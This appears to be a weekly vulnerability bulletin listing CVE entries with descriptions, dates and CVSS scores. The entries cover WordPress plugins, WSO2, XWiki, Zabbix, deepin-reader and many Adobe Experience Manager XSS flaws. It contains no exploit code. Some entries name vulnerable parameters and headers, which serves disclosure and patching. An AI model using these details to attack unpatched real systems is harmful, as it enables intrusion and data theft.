wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2. | 2023-12-20 | 7.5 | CVE-2023-35914
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. | 2023-12-20 | 7.6 | CVE-2023-35915
wordpress — wordpress | Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. | 2023-12-20 | 7.5 | CVE-2023-35916
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in MainWP MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3. | 2023-12-20 | 7.6 | CVE-2023-38519
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. | 2023-12-20 | 7.4 | CVE-2023-46147
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress. This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.18. | 2023-12-19 | 7.2 | CVE-2023-46154
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8. | 2023-12-20 | 7.6 | CVE-2023-47236
wordpress — wordpress | The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitize the `wp_query` parameter which allows an attacker to run arbitrary command on the remote server. | 2023-12-18 | 7.2 | CVE-2023-4724
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection. This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7. | 2023-12-18 | 7.2 | CVE-2023-47530
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5. | 2023-12-20 | 7.2 | CVE-2023-47852
wordpress — wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.1. | 2023-12-21 | 7.5 | CVE-2023-48288
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WC Vendors WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors. This issue affects WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7. | 2023-12-19 | 7.6 | CVE-2023-48327
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in QuantumCloud AI ChatBot. This issue affects AI ChatBot: from n/a through 4.7.8. | 2023-12-19 | 7.2 | CVE-2023-48741
wordpress — wordpress | Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4. | 2023-12-15 | 7.5 | CVE-2023-49159
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Younes JFR. Advanced Database Cleaner. This issue affects Advanced Database Cleaner: from n/a through 3.1.2. | 2023-12-19 | 7.2 | CVE-2023-49764
wordpress — wordpress | The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorized users from accessing password-protected posts’ content. | 2023-12-18 | 7.5 | CVE-2023-5949
wordpress — wordpress | The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request. | 2023-12-18 | 7.5 | CVE-2023-6203
wordpress — wordpress | The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks. | 2023-12-18 | 7.2 | CVE-2023-6222
wordpress — wordpress | The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. | 2023-12-18 | 7.2 | CVE-2023-6295
wordpress — wordpress | The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘import_action’ function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site’s server which may make remote code execution possible. | 2023-12-15 | 7.2 | CVE-2023-6826
wordpress — wordpress | The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the ‘content-backups’ and ‘content-name’, ‘content-manifest’, or ‘content-bmitmp’ and ‘content-identy’ HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. | 2023-12-23 | 7.5 | CVE-2023-6972
wordpress — wordpress | The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the ‘url’ parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system. | 2023-12-23 | 7.2 | CVE-2023-7002
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50. | 2023-12-20 | 8.5 | CVE-2023-33330
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products. This issue affects Recently Viewed Products: from n/a through 1.0.0. | 2023-12-19 | 8.3 | CVE-2023-34027
wordpress — wordpress | Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15. | 2023-12-20 | 8.4 | CVE-2023-47784
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. | 2023-12-20 | 8.5 | CVE-2023-49825
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. | 2023-12-21 | 8.1 | CVE-2023-49826
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection – Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection – Stop Brute Force Attacks: from n/a through 2.2.5. | 2023-12-19 | 7.6 | CVE-2023-48764
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2. | 2023-12-20 | 7.6 | CVE-2023-49161
wordpress — wordpress | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0. | 2023-12-20 | 7.6 | CVE-2023-49166
wordpress — wordpress | Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3. | 2023-12-19 | 7.5 | CVE-2023-49819
wso2 — multiple_products | Multiple WSO2 products have been identified as vulnerable to perform user impersonation using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the “Prompt for username, password and consent” option. * A service provider that uses the above IDP for federated authentication and has the “Assert identity using mapped local subject identifier” flag enabled. Attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation. | 2023-12-15 | 8.5 | CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products | Multiple WSO2 products have been identified as vulnerable to an XML External Entity (XXE) attack, which abuses a widely available but rarely used feature of XML parsers to access sensitive information. | 2023-12-15 | 7.5 | CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
wuhan_deepin_technology_co.,_ltd. — deepin-reader | Deepin Linux’s default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. | 2023-12-22 | 9.3 | CVE-2023-50254
xwiki — xwiki | XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn’t properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user’s profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be manually applied to the page `XWiki.SearchAdmin`. | 2023-12-15 | 8.8 | CVE-2023-50721
xwiki — xwiki | XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn’t require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`. | 2023-12-15 | 8.8 | CVE-2023-50722
xwiki — xwiki | XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages. | 2023-12-15 | 8.8 | CVE-2023-50723
xwiki — xwiki | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It’s possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1. | 2023-12-21 | 8.3 | CVE-2023-50732
xwiki — xwiki | XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. | 2023-12-15 | 7.5 | CVE-2023-50719
zabbix — zabbix-agent | The vulnerability is caused by an improper check that RDLENGTH does not overflow the buffer in the response from the DNS server. | 2023-12-18 | 8.1 | CVE-2023-32726
zabbix — zabbix-agent2 | The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command, resulting in a possible remote code execution vulnerability. | 2023-12-18 | 9.8 | CVE-2023-32728
zabbix — zabbix_server | The website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user. | 2023-12-18 | 8.8 | CVE-2023-32725
zabbix — zabbix_server | An attacker who has the privilege to configure Zabbix items can use the function icmpping() with an additional malicious command inside it to execute arbitrary code on the current Zabbix server. | 2023-12-18 | 7.2 | CVE-2023-32727


Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-47064
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-47065
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48440
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction. | 2023-12-15 | 5.3 | CVE-2023-48441
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48442
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48443
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48444
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48445
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48446
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48447
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48448
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48449
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48450
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48451
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48452
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48453
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48454
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48455
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48456
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48457
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48458
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48459
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48460
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48461
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48462
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48463
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48464
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48465
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48466
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48467
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48468
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48469
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48470
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48471
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48472
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48473
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48474
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48475
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48476
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48477
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48478
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48479
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48480
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48481
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48482
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48483
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48484
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48485
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48486
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48487
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48488
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48489
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48490
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48491
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48492
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48493
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48494
